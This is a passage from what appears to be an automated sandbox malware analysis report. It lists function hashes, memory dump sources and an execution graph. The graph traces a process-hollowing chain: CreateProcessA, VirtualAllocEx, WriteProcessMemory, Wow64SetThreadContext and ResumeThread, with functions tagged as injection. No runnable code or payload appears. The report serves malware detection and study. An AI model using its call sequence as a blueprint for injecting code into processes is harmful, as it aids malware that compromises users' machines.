                                            • Instruction Fuzzy Hash: E0C0123310C1242BAA24504E7C409A3674CC2CA2B4A150177F51C9720055429C8041B4
                                            Function 0319A70D Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 498314a507476d263e4d93817e20443acdbc1a6d4c0880f73c7c47f190127365
                                            • Instruction ID: 5cd35571027ed135ef8a424c8f4f7e55a34741ec21029c96b80169a78f77d0e1
                                            • Opcode Fuzzy Hash: 498314a507476d263e4d93817e20443acdbc1a6d4c0880f73c7c47f190127365
                                            • Instruction Fuzzy Hash: ABD0677AB510189FCB049F98E8808DDB7B6FF9C221B048116E915A3265C6319961DB60
                                            Function 03195EA8 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e700cf67f46ccc1987d2fde9b248ec9472c3262674cbea4e6aa25012f2bab08
                                            • Instruction ID: 1e3f9cfb64480fe96fc7c4ea04a73215464aed9edb535f27f7cd5ac2e2dec7ee
                                            • Opcode Fuzzy Hash: 6e700cf67f46ccc1987d2fde9b248ec9472c3262674cbea4e6aa25012f2bab08
                                            • Instruction Fuzzy Hash: 96D0C2700187464BC716F735EA804243B3DFE84304F800A94F4054A006EA7A584947A2
                                            Function 03195EB8 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b162b472ba8cf72ee07a852cb182a7c190af1ec6e08a68177e582b0feff5690
                                            • Instruction ID: 73eafb0a46afac59dd7a9b3483677d569f6d38045b7762acfb161ae5eca44060
                                            • Opcode Fuzzy Hash: 2b162b472ba8cf72ee07a852cb182a7c190af1ec6e08a68177e582b0feff5690
                                            • Instruction Fuzzy Hash: 65C0127010470A47C556F775EA85565372EFFC4300F805914F00A0A116EF7D2C8547A1

                                            Non-executed Functions

                                            Function 03196088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \;cq$\;cq$\;cq$\;cq
                                            • API String ID: 0-2961067002
                                            • Opcode ID: 010a3ab01d43933741e8cf06737891f2525aec19c115a5fd1978a5c2a7c10b43
                                            • Instruction ID: e5e8f24ff41b959d3b15bb28bf5a15d08e3cccab39b17f6090b5096a0c526d94
                                            • Opcode Fuzzy Hash: 010a3ab01d43933741e8cf06737891f2525aec19c115a5fd1978a5c2a7c10b43
                                            • Instruction Fuzzy Hash: C8015E317101148FEF28CA2DC48492A77A6AFDC67076F416BE506CB2A4DB71DC818760

                                            Execution Graph

                                            Execution Coverage:13%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:266
                                            Total number of Limit Nodes:16
                                            execution_graph 24010 e0e590 24012 e0e5b7 24010->24012 24011 e0e694 24012->24011 24014 e0e158 24012->24014 24015 e0f648 CreateActCtxA 24014->24015 24017 e0f74e 24015->24017 24018 9db73aa 24019 9db7399 24018->24019 24020 9db73a8 24018->24020 24019->24020 24021 9db91e8 12 API calls 24019->24021 24022 9db9198 12 API calls 24019->24022 24023 9db9188 12 API calls 24019->24023 24021->24020 24022->24020 24023->24020 23699 9a61b80 23700 9a61bba 23699->23700 23701 9a61c36 23700->23701 23702 9a61c4b 23700->23702 23707 9a6176c 23701->23707 23703 9a6176c 3 API calls 23702->23703 23705 9a61c5a 23703->23705 23708 9a61777 23707->23708 23709 9a61c41 23708->23709 23712 9a62688 23708->23712 23718 9a62678 23708->23718 23725 9a617b4 23712->23725 23714 9a626af 23714->23709 23716 9a62752 CreateIconFromResourceEx 23717 9a627ad 23716->23717 23717->23709 23719 9a62688 23718->23719 23720 9a617b4 CreateIconFromResourceEx 23719->23720 23722 9a626a2 23720->23722 23721 9a626af 23721->23709 23722->23721 23723 9a62752 CreateIconFromResourceEx 23722->23723 23724 9a627ad 23723->23724 23724->23709 23726 9a626d8 CreateIconFromResourceEx 23725->23726 23728 9a626a2 23726->23728 23728->23714 23728->23716 23729 9db753c 23730 9db7399 23729->23730 23731 9db73a8 23729->23731 23730->23731 23735 9db91e8 23730->23735 23755 9db9188 23730->23755 23774 9db9198 23730->23774 23736 9db9194 23735->23736 23737 9db91ef 23735->23737 23740 9db91d6 23736->23740 23793 9db9851 23736->23793 23798 9db98d2 23736->23798 23802 9db95f2 23736->23802 23806 9db9713 23736->23806 23821 9db9cfe 23736->23821 23826 9db97da 23736->23826 23830 9db9666 23736->23830 23843 9db9f67 23736->23843 23848 9db96e0 23736->23848 23861 9db97a1 23736->23861 23866 9db9881 23736->23866 23879 9db9a22 23736->23879 23893 9db9ac3 23736->23893 23898 9db982c 23736->23898 23903 9db992d 23736->23903 23908 9db9649 23736->23908 23737->23731 23740->23731 23756 9db91b2 23755->23756 23757 9db97da 2 API calls 23756->23757 23758 9db9cfe 2 API calls 23756->23758 23759 9db91d6 23756->23759 23760 9db9713 8 API calls 23756->23760 23761 9db95f2 2 API calls 23756->23761 23762 9db98d2 2 API calls 23756->23762 23763 9db9851 2 API calls 23756->23763 23764 9db9649 6 API calls 23756->23764 23765 9db992d 2 API calls 23756->23765 23766 9db982c 2 API calls 23756->23766 23767 9db9ac3 2 API calls 23756->23767 23768 9db9a22 6 API calls 23756->23768 23769 9db9881 6 API calls 23756->23769 23770 9db97a1 2 API calls 23756->23770 23771 9db96e0 6 API calls 23756->23771 23772 9db9f67 2 API calls 23756->23772 23773 9db9666 6 API calls 23756->23773 23757->23759 23758->23759 23759->23731 23760->23759 23761->23759 23762->23759 23763->23759 23764->23759 23765->23759 23766->23759 23767->23759 23768->23759 23769->23759 23770->23759 23771->23759 23772->23759 23773->23759 23775 9db91b2 23774->23775 23776 9db91d6 23775->23776 23777 9db97da 2 API calls 23775->23777 23778 9db9cfe 2 API calls 23775->23778 23779 9db9713 8 API calls 23775->23779 23780 9db95f2 2 API calls 23775->23780 23781 9db98d2 2 API calls 23775->23781 23782 9db9851 2 API calls 23775->23782 23783 9db9649 6 API calls 23775->23783 23784 9db992d 2 API calls 23775->23784 23785 9db982c 2 API calls 23775->23785 23786 9db9ac3 2 API calls 23775->23786 23787 9db9a22 6 API calls 23775->23787 23788 9db9881 6 API calls 23775->23788 23789 9db97a1 2 API calls 23775->23789 23790 9db96e0 6 API calls 23775->23790 23791 9db9f67 2 API calls 23775->23791 23792 9db9666 6 API calls 23775->23792 23776->23731 23777->23776 23778->23776 23779->23776 23780->23776 23781->23776 23782->23776 23783->23776 23784->23776 23785->23776 23786->23776 23787->23776 23788->23776 23789->23776 23790->23776 23791->23776 23792->23776 23794 9db9857 23793->23794 23921 9db6388 23794->23921 23925 9db6380 23794->23925 23795 9db9fa8 23929 9db6af8 23798->23929 23933 9db6af0 23798->23933 23799 9db9900 23799->23740 23937 9db6e80 23802->23937 23941 9db6e76 23802->23941 23953 9db6c48 23806->23953 23957 9db6c50 23806->23957 23807 9db964d 23807->23740 23808 9db9e60 23807->23808 23809 9db9d15 23807->23809 23810 9db9868 23807->23810 23945 9db68a8 23807->23945 23949 9db68b0 23807->23949 23808->23740 23815 9db6af8 WriteProcessMemory 23809->23815 23816 9db6af0 WriteProcessMemory 23809->23816 23819 9db6388 ResumeThread 23810->23819 23820 9db6380 ResumeThread 23810->23820 23811 9db9d36 23812 9db9fa8 23815->23811 23816->23811 23819->23812 23820->23812 23822 9db9d04 23821->23822 23824 9db6af8 WriteProcessMemory 23822->23824 23825 9db6af0 WriteProcessMemory 23822->23825 23823 9db9d36 23824->23823 23825->23823 23828 9db68a8 Wow64SetThreadContext 23826->23828 23829 9db68b0 Wow64SetThreadContext 23826->23829 23827 9db97f4 23827->23740 23828->23827 23829->23827 23841 9db68a8 Wow64SetThreadContext 23830->23841 23842 9db68b0 Wow64SetThreadContext 23830->23842 23831 9db9868 23837 9db6388 ResumeThread 23831->23837 23838 9db6380 ResumeThread 23831->23838 23832 9db9fa8 23833 9db9d15 23839 9db6af8 WriteProcessMemory 23833->23839 23840 9db6af0 WriteProcessMemory 23833->23840 23834 9db964d 23834->23740 23834->23830 23834->23831 23834->23833 23836 9db9e60 23834->23836 23835 9db9d36 23836->23740 23837->23832 23838->23832 23839->23835 23840->23835 23841->23834 23842->23834 23844 9db9f6d 23843->23844 23846 9db6388 ResumeThread 23844->23846 23847 9db6380 ResumeThread 23844->23847 23845 9db9fa8 23846->23845 23847->23845 23849 9db964d 23848->23849 23849->23740 23850 9db9d15 23849->23850 23851 9db9868 23849->23851 23854 9db9e60 23849->23854 23857 9db68a8 Wow64SetThreadContext 23849->23857 23858 9db68b0 Wow64SetThreadContext 23849->23858 23859 9db6af8 WriteProcessMemory 23850->23859 23860 9db6af0 WriteProcessMemory 23850->23860 23855 9db6388 ResumeThread 23851->23855 23856 9db6380 ResumeThread 23851->23856 23852 9db9d36 23853 9db9fa8 23853->23853 23854->23740 23855->23853 23856->23853 23857->23849 23858->23849 23859->23852 23860->23852 23862 9db97ae 23861->23862 23864 9db6af8 WriteProcessMemory 23862->23864 23865 9db6af0 WriteProcessMemory 23862->23865 23863 9db9d8c 23864->23863 23865->23863 23869 9db964d 23866->23869 23867 9db9d15 23877 9db6af8 WriteProcessMemory 23867->23877 23878 9db6af0 WriteProcessMemory 23867->23878 23868 9db9d36 23869->23740 23869->23866 23869->23867 23870 9db9868 23869->23870 23871 9db9e60 23869->23871 23875 9db68a8 Wow64SetThreadContext 23869->23875 23876 9db68b0 Wow64SetThreadContext 23869->23876 23873 9db6388 ResumeThread 23870->23873 23874 9db6380 ResumeThread 23870->23874 23871->23740 23872 9db9fa8 23872->23872 23873->23872 23874->23872 23875->23869 23876->23869 23877->23868 23878->23868 23880 9db9a39 23879->23880 23885 9db964d 23879->23885 23880->23740 23881 9db9868 23887 9db6388 ResumeThread 23881->23887 23888 9db6380 ResumeThread 23881->23888 23882 9db9fa8 23883 9db9d15 23889 9db6af8 WriteProcessMemory 23883->23889 23890 9db6af0 WriteProcessMemory 23883->23890 23884 9db9d36 23885->23740 23885->23881 23885->23883 23886 9db9e60 23885->23886 23891 9db68a8 Wow64SetThreadContext 23885->23891 23892 9db68b0 Wow64SetThreadContext 23885->23892 23886->23740 23887->23882 23888->23882 23889->23884 23890->23884 23891->23885 23892->23885 23894 9db9ac7 23893->23894 23961 9db69d8 23894->23961 23965 9db69d0 23894->23965 23895 9db9ae5 23895->23740 23899 9db9ac7 23898->23899 23901 9db69d8 VirtualAllocEx 23899->23901 23902 9db69d0 VirtualAllocEx 23899->23902 23900 9db9ae5 23900->23740 23901->23900 23902->23900 23904 9db9947 23903->23904 23906 9db6388 ResumeThread 23904->23906 23907 9db6380 ResumeThread 23904->23907 23905 9db9fa8 23905->23905 23906->23905 23907->23905 23911 9db964d 23908->23911 23909 9db9d15 23919 9db6af8 WriteProcessMemory 23909->23919 23920 9db6af0 WriteProcessMemory 23909->23920 23910 9db9d36 23911->23740 23911->23909 23912 9db9868 23911->23912 23913 9db9e60 23911->23913 23917 9db68a8 Wow64SetThreadContext 23911->23917 23918 9db68b0 Wow64SetThreadContext 23911->23918 23915 9db6388 ResumeThread 23912->23915 23916 9db6380 ResumeThread 23912->23916 23913->23740 23914 9db9fa8 23914->23914 23915->23914 23916->23914 23917->23911 23918->23911 23919->23910 23920->23910 23922 9db63cc ResumeThread 23921->23922 23924 9db6418 23922->23924 23924->23795 23926 9db63cc ResumeThread 23925->23926 23928 9db6418 23926->23928 23928->23795 23930 9db6b44 WriteProcessMemory 23929->23930 23932 9db6bdd 23930->23932 23932->23799 23934 9db6b44 WriteProcessMemory 23933->23934 23936 9db6bdd 23934->23936 23936->23799 23938 9db6f07 23937->23938 23938->23938 23939 9db70f2 CreateProcessA 23938->23939 23940 9db715c 23939->23940 23942 9db6f07 23941->23942 23942->23942 23943 9db70f2 CreateProcessA 23942->23943 23944 9db715c 23943->23944 23944->23944 23946 9db68b2 Wow64SetThreadContext 23945->23946 23948 9db6971 23946->23948 23948->23807 23950 9db68f9 Wow64SetThreadContext 23949->23950 23952 9db6971 23950->23952 23952->23807 23954 9db6c9c ReadProcessMemory 23953->23954 23956 9db6d14 23954->23956 23956->23807 23958 9db6c9c ReadProcessMemory 23957->23958 23960 9db6d14 23958->23960 23960->23807 23962 9db6a1c VirtualAllocEx 23961->23962 23964 9db6a94 23962->23964 23964->23895 23966 9db69da VirtualAllocEx 23965->23966 23968 9db6a94 23966->23968 23968->23895 23696 e08278 23697 e082c5 VirtualProtect 23696->23697 23698 e08331 23697->23698 23969 e00848 23970 e0085a 23969->23970 23973 e08379 23970->23973 23974 e083a4 23973->23974 23975 e00871 23974->23975 23978 e098d1 23974->23978 23982 e09908 23974->23982 23979 e098d4 23978->23979 23986 e0993f 23979->23986 23983 e0991f 23982->23983 23985 e0993f NtQueryInformationProcess 23983->23985 23984 e09933 23984->23974 23985->23984 23987 e09970 23986->23987 23991 e099b0 23987->23991 23995 e099a1 23987->23995 23988 e09933 23988->23974 23992 e099d4 23991->23992 23993 e09b08 23992->23993 23999 e007f4 23992->23999 23993->23988 23996 e099d4 23995->23996 23997 e09b08 23996->23997 23998 e007f4 NtQueryInformationProcess 23996->23998 23997->23988 23998->23996 24000 e09b70 NtQueryInformationProcess 23999->24000 24002 e09c37 24000->24002 24002->23992 24003 9dba3f0 24004 9dba57b 24003->24004 24005 9dba416 24003->24005 24005->24004 24007 9db3598 24005->24007 24008 9dba6c8 PostMessageW 24007->24008 24009 9dba775 24008->24009 24009->24005

                                            Executed Functions

                                            Function 00E007F4 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00E09C25
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2229308253.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_e00000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID:
                                            • API String ID: 1778838933-0
                                            • Opcode ID: 1cc7b9ae7571c3d73e320fe83571be53e7756ae2ceaf5dbb8f4e0aa61f4445e2
                                            • Instruction ID: 581e424568221f5f1005ef790c821c6e65ff204d138f8f13ee725a939a6ef591
                                            • Opcode Fuzzy Hash: 1cc7b9ae7571c3d73e320fe83571be53e7756ae2ceaf5dbb8f4e0aa61f4445e2
                                            • Instruction Fuzzy Hash: 3D4166B9D042589FCF10CFA9D984A9EFBF5BB59310F10A02AE814B7211D375A945CF64
                                            Function 00E09B68 Relevance: 1.6, APIs: 1, Instructions: 101nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00E09C25
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2229308253.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_e00000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID:
                                            • API String ID: 1778838933-0
                                            • Opcode ID: fc8633953aac238b85a46c9674fc609dd421fb82e447dd308c525800f24620d0
                                            • Instruction ID: f417ec784082654bc169069983dcabaef66edb6ecfed1c0211d8521c1ee7a05d
                                            • Opcode Fuzzy Hash: fc8633953aac238b85a46c9674fc609dd421fb82e447dd308c525800f24620d0
                                            • Instruction Fuzzy Hash: 9A3165B9D04258DFCF10CFA9D984A9EFBB1BB59310F24A02AE818B7311D335A945CF64
                                            Function 09DB6E76 Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 943 9db6e76-9db6f19 945 9db6f1b-9db6f32 943->945 946 9db6f62-9db6f8a 943->946 945->946 949 9db6f34-9db6f39 945->949 950 9db6f8c-9db6fa0 946->950 951 9db6fd0-9db7026 946->951 952 9db6f3b-9db6f45 949->952 953 9db6f5c-9db6f5f 949->953 950->951 958 9db6fa2-9db6fa7 950->958 960 9db7028-9db703c 951->960 961 9db706c-9db715a CreateProcessA 951->961 955 9db6f49-9db6f58 952->955 956 9db6f47 952->956 953->946 955->955 959 9db6f5a 955->959 956->955 962 9db6fca-9db6fcd 958->962 963 9db6fa9-9db6fb3 958->963 959->953 960->961 969 9db703e-9db7043 960->969 979 9db715c-9db7162 961->979 980 9db7163-9db7248 961->980 962->951 964 9db6fb7-9db6fc6 963->964 965 9db6fb5 963->965 964->964 968 9db6fc8 964->968 965->964 968->962 971 9db7066-9db7069 969->971 972 9db7045-9db704f 969->972 971->961 973 9db7053-9db7062 972->973 974 9db7051 972->974 973->973 975 9db7064 973->975 974->973 975->971 979->980 992 9db724a-9db724e 980->992 993 9db7258-9db725c 980->993 992->993 994 9db7250 992->994 995 9db725e-9db7262 993->995 996 9db726c-9db7270 993->996 994->993 995->996 997 9db7264 995->997 998 9db7272-9db7276 996->998 999 9db7280-9db7284 996->999 997->996 998->999 1002 9db7278 998->1002 1000 9db72ba-9db72c5 999->1000 1001 9db7286-9db72af 999->1001 1006 9db72c6 1000->1006 1001->1000 1002->999 1006->1006
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09DB7147
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: f50c4fbd0210e86d66a3c62982b31096564cf2c67c2597270747a1deb2f964d5
                                            • Instruction ID: f77151abf10688cd8f3b446848e00776c7fe1253fa5ea5bd98629bebe9c40d3c
                                            • Opcode Fuzzy Hash: f50c4fbd0210e86d66a3c62982b31096564cf2c67c2597270747a1deb2f964d5
                                            • Instruction Fuzzy Hash: B7C10771D00219CFDF24CFA8C841BEDBBB1BB49314F0095A9E50ABB650DB749A85CF94
                                            Function 09DB6E80 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09DB7147
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 2ef77eb2a85028e4b8dd46cb10d86ca8e6726cfbd6d629a2d75db46f472878a5
                                            • Instruction ID: a306ea547921ab1cb5f8706c4002ad6227c3a586335e84c72493e6c9cf41a7c8
                                            • Opcode Fuzzy Hash: 2ef77eb2a85028e4b8dd46cb10d86ca8e6726cfbd6d629a2d75db46f472878a5
                                            • Instruction Fuzzy Hash: ECC10671D00219CFDF24CFA8C841BEDBBB1BB49314F0095A9E91ABB650DB749A85CF94
                                            Function 09A617A8 Relevance: 1.7, APIs: 1, Instructions: 151windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 09A6279B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239066040.0000000009A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9a60000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: ed54ccee5dabae695fbe1675b9fb8e63581ee30a18eac1c70d94b07c3bcc2111
                                            • Instruction ID: e76184c13746a0762a41c0840bab669879f620b85518756169509d3cc6dd50be
                                            • Opcode Fuzzy Hash: ed54ccee5dabae695fbe1675b9fb8e63581ee30a18eac1c70d94b07c3bcc2111
                                            • Instruction Fuzzy Hash: 6F51D2B5D042589FCF04CFA9D884AAEFBF4EF19310F14945AE814BB321D731A941CBA4
                                            Function 09A62688 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239066040.0000000009A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9a60000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: 4ef4f56399f4d02b6fd99df179204fd7471a18bb52cb6fa8de0a8625d5502f1b
                                            • Instruction ID: 71f4a9d4dac3f7e07c2bc1d2fec3867678767d1249a8d6cf7b8bd2904cbc8585
                                            • Opcode Fuzzy Hash: 4ef4f56399f4d02b6fd99df179204fd7471a18bb52cb6fa8de0a8625d5502f1b
                                            • Instruction Fuzzy Hash: 6651CDB5D042589FCF01CFA9D880A9EBFB5EF1A310F14906AE914BB221C335A941DF64
                                            Function 00E0E158 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00E0F739
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2229308253.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_e00000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: c407649a94aa264afd6d02d08ffe03fec8ae113ac0e073057556e204b99fcd33
                                            • Instruction ID: ce74c4cd699c933f957330be69629cf3f2ad0e7e252fcdfe2bd0ebee771b8070
                                            • Opcode Fuzzy Hash: c407649a94aa264afd6d02d08ffe03fec8ae113ac0e073057556e204b99fcd33
                                            • Instruction Fuzzy Hash: 1751C0B1D002189FDB21DFA9C840BDEBBF5AF49700F1084AAD509BB251DA716A89CF91
                                            Function 09A617B4 Relevance: 1.6, APIs: 1, Instructions: 118windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 09A6279B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239066040.0000000009A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9a60000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: ec8a402c7b542285064731aa591eed774b1aa7920eb0d07e451b146fb0d3b8f6
                                            • Instruction ID: f5e8f109532b705f7e9acb9ecc2e9e7caad1e3abad99c5bb5be15553f1b163a4
                                            • Opcode Fuzzy Hash: ec8a402c7b542285064731aa591eed774b1aa7920eb0d07e451b146fb0d3b8f6
                                            • Instruction Fuzzy Hash: E74168B9D042589FCF10CFA9D984A9EFBB4EB19310F14A01AE914BB210D335A951DF68
                                            Function 09DB6AF0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09DB6BCB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: d9977b7497e62cc8f07e3eadbffca1bebc64b5d6820d07f8ed46df09f74fcb86
                                            • Instruction ID: 8a18212527fe843d7fef2d0194a0f97c6e71d6fd071fa4d4e7008a572bc1c3da
                                            • Opcode Fuzzy Hash: d9977b7497e62cc8f07e3eadbffca1bebc64b5d6820d07f8ed46df09f74fcb86
                                            • Instruction Fuzzy Hash: 1141B9B5D002588FCB14CFA9D984AEEFBF1FB49310F24942AE819B7210C739AA45CB54
                                            Function 09DB6AF8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09DB6BCB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: e2a1db036de7b49f92f9abcafd143b059a5f13fe56667ff77547e06ccd626fd0
                                            • Instruction ID: 9563393ca8383ae5103c263315a0aa4b93ab129549ce9589b91bdd27d1b0d614
                                            • Opcode Fuzzy Hash: e2a1db036de7b49f92f9abcafd143b059a5f13fe56667ff77547e06ccd626fd0
                                            • Instruction Fuzzy Hash: BC41A9B5D012589FCF00CFA9D984AEEFBF1BB49310F14942AE819BB200C735AA45CB64
                                            Function 09DB6C48 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09DB6D02
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 73cf6b037c7aa6ee5095ec5a99fe2e4179f40abddad13d77686970c73be832b3
                                            • Instruction ID: 074fb91f6fdac697fc5b1404ee92799bbef17433d3610ae57b86fcc4a568f5e1
                                            • Opcode Fuzzy Hash: 73cf6b037c7aa6ee5095ec5a99fe2e4179f40abddad13d77686970c73be832b3
                                            • Instruction Fuzzy Hash: 1D41A8B5D00258DFCF14CFA9D884AEEFBB1BB59310F14902AE815B7210C775A945CF64
                                            Function 09DB6C50 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09DB6D02
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: c69775c7a774159c426e5af670c3088e15fc9e76281fb9bae0c2db40dc60e1bc
                                            • Instruction ID: a08045203b16f7452cf2ab87e29382d6cfd2e770f985338918d729fb794c82ed
                                            • Opcode Fuzzy Hash: c69775c7a774159c426e5af670c3088e15fc9e76281fb9bae0c2db40dc60e1bc
                                            • Instruction Fuzzy Hash: B141A9B9D04258DFCF10CFAAD884AEEFBB1BB59320F14942AE815B7200D775A945CF64
                                            Function 09DB69D0 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09DB6A82
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: b1cb0b6f9f1d54ced802e2d4f3eb1655a5ffb1af53abc275f0574c50e652fbac
                                            • Instruction ID: 4ff181f560cfc163f0e72e785f4b0d2ed6a7f4c6ecc291013afa4f88508b9ea3
